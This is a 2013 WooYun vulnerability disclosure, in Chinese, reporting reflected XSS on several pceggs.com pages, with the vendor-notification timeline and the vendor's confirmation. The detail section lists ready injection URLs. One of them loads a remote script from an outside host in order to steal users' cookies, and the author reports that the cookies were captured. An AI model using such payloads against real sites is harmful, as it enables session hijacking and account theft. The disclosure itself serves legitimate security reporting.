当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027573

漏洞标题:PC蛋蛋反射性XSS盲打各种用户

相关厂商:pceggs.com

漏洞作者: 孤独雪狼

提交时间:2013-07-04 16:23

修复时间:2013-08-18 16:24

公开时间:2013-08-18 16:24

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-04: 细节已通知厂商并且等待厂商处理中
2013-07-04: 厂商已经确认,细节仅向厂商公开
2013-07-14: 细节向核心白帽子及相关领域专家公开
2013-07-24: 细节向普通白帽子公开
2013-08-03: 细节向实习白帽子公开
2013-08-18: 细节向公众公开

简要描述:

最近乌云币很值钱啊。。。。

详细说明:

1、顾名思义,我们得先找到存在XSS漏洞的地方对吧,大概看了下,三个地方存在XSS

http://www.pceggs.com/prize/chargeuserlist.aspx?issue=tfx-h0462%22/%3E%3Cscript%3Ealert%28%27www.anying.org%27%29%3C/script%3E


http://www.pceggs.com/prize/prizebbs.aspx?issue=tfx-h0462%22/%3E%3Cscript%3Ealert%28%27www.anying.org%27%29%3C/script%3E


http://www.pceggs.com/duobao/duobao_index.aspx?id=10001691%22/%3E%3Cscript%3Ealert%28%27www.anying.org%27%29%3C/script%3E


2、ok,我们把代码换位盗取cookies的代码。

http://www.pceggs.com/duobao/duobao_index.aspx?id=10001691%22/%3E%3Cscript%20src=http://x.co/16GzJ%3E%3C/script%3E


这里我就随便找了个XSS平台来演示下哈。然后可以去论坛发消息,各种消息,同样也可以私信给别人,我这里找的是一位朋友来帮忙测试的
3、成功盗取COOKIES

QQ截图20130703130310.png


有了cookies后面就不用说了吧。。。。很多厂商都不注重反射性XSS。。其实反射性XSS也是可以利用的,当然这可能受害最大的只是用户。但如果工作人员安全意识不是那么强的话,一样可以盲打的。。。。

漏洞证明:

QQ截图20130703130310.png

修复方案:

过滤、。。。。

版权声明:转载请注明来源 孤独雪狼@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2013-07-04 17:33

厂商回复:

非常感谢您的反馈,该问题我们正在修复中

最新状态:

暂无